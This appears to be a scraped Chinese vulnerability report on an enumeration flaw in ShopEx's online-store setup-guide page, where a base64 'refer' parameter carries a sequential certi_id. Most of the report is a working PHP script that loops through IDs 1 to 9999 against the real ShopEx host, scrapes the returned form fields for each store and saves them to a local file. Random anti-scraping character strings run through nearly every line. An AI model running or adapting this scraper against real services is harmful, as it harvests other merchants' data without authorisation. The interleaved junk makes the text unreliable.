|
简要描述:
/ v8 [. I5 U0 @9 f6 ]2 o! @8 X+ d, bShopEx某接口缺陷,可遍历所有网站
$ S7 h' l1 K! c b. U6 U; z2 `# ]* Q详细说明:' s. p. W* F' x6 t
问题出现在shopex 网店使用向导页面 Y/ F+ I5 t9 e2 N3 ~
8 V/ @0 U3 D8 t; V" ^ U* a( r
) k6 v0 ?/ u c/ H3 t2 ^ O/ U) b# U2 ]# q/ @
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
# S& t5 E9 O% P1 v4 ^% \ r' N3 s
8 V' h& A g; } Y" t4 ]
" J& [: u9 l( b* w: X% V& Prefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}' Q' W& t. e9 s8 o7 t
! p7 c% A9 T2 N/ d+ }
( g& k3 W- v& d% S( l/ k$ {1 q. u0 b
6 b9 ]; C* Z4 C( l) _5 @我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
8 Z, @& h/ {$ \( B* F9 C3 N6 a$ ]3 ?" p3 y
' X0 ?/ N: H" p8 e( N0 }4 M
0 w* I$ N+ A% k8 K, g. x
<?php
! ^% S0 ?8 f! @ b
( j3 f# `) ^5 r7 [( W7 r for ($i=1; $i < 10000; $i++) { //遍历
( n# r! [0 [% R/ F
4 S# U2 b3 g1 }( p/ M1 D ShowshopExD($i);
) c( s8 p& b/ k, \2 s. @& T0 Z G7 o' i6 v" q+ v! V3 H1 n T
}
% m: Y/ q. F6 R1 m
, h7 W' A% p' P! O, M. d! o function ShowshopExD($cid) {
' n( j0 W4 @( g8 [0 M4 K% e) V. |7 | m8 w- T* p2 o+ Y
$url='http://guide.ecos.shopex.cn/step2.php';/ c C \9 P; t$ O/ R2 O
$ k1 w# a- D" U+ J6 |4 M P
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
: ]9 {6 C* p8 W. H8 W2 G0 S; F4 g* H/ ~* p) _; V
$url = $url.'?refer='.$refer;
- {7 u# x# p, \. w5 w- e( L: z* ~9 D Z, u
$ch = curl_init($url);
: n5 T5 Z+ }4 k" z/ P; U. d+ K" Q' k; Z$ B9 z+ q
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
5 J8 s, ` _! ]" O' B, ~" |% C2 A9 V% s2 Z) G) L- G3 Z0 i
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;: G) e) X# r X
+ i6 h, M: a. b; t/ N
$result = curl_exec($ch);- {; H- ]* j: j! ]- o
z$ q: i9 O% T* Y# G! u; \+ M w $result = mb_convert_encoding($result, "gb2312", "UTF-8");
/ o: S: [( d) q: ~) G; `6 ?, P1 c! `' e5 X
if(strpos($result,$refer))
2 K! d" Q7 y9 b! L3 H% R2 r! L9 l; F3 g
{2 x$ R- f- w+ u! d
+ A+ s3 R& P5 C* D7 k' a9 O7 B
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件8 m8 H( C. T1 L8 X& ~* z
+ |& G; }, [( _( w) O
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
. T7 L% P. I; G/ j% A/ G5 }
x! C, k4 l+ G7 p+ Z8 [ C1 f foreach ($value[1] as $key) {
1 a ^% d# ^7 V( F' I+ D" n* J$ V! T
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
$ J, {/ n. _3 N! j+ k X( B: W7 N/ t8 P# O9 C# e. Z6 t( _
echo $res[1][0].':'.$res[3][0]."\r\n";
. |8 M8 l# y' [6 X4 B0 k
: C6 M3 J6 `% U $col =$res[1][0].':'.$res[3][0]."\r\n";
: h* h) W! p& n/ i. l& m
7 w% |" n$ T8 z- g- @ fwrite($fp, $col, strlen($col)); + X2 B: l5 [! N; K
) M' ]9 d/ P2 @, Y, _ }
; B i# `5 X/ q7 \7 X' D- Q$ G* p% n% h
echo '--------------------------------'."\r\n";
& x/ s z4 p2 |# d2 h) \( c e0 V' H0 k9 }# Q# [7 ?4 k& F7 l
fclose($fp);
% O1 m, S% M. K+ s6 X7 P% L, j9 A7 c# u& Q S/ _. @0 J
}
, Z- d) l' d( W( C$ R# e9 }
- ^: t1 S! x, u! ~% I- c* K flush();
* N% ~+ j2 o9 z
9 P; L2 ^0 O; P: @ curl_close($ch);; k/ Z" a1 }$ D. ]# F O: ]2 P
" C) c& r& h0 v) {, o4 p0 e3 a }, e7 P- c, v( N
; D* q0 \) a9 O/ b8 H. Z?>- Y" d: E1 O1 ~; M C: _* }
漏洞证明:7 r) I0 |( N: ?9 Z0 w
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg* a/ z* k v+ i+ r6 ]
refer换成其他加密方式1 h; X# I) C2 w7 v$ A T
|
|